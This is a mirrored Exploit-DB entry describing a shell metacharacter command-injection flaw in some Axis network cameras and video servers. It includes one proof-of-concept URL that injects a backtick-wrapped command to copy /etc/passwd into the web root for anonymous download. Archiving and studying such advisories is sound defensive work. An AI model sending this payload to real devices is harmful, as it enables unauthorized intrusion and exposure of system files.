bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/24400.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
562 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/11011/info
1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers
http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60
Reference in a new issue View git blame Copy permalink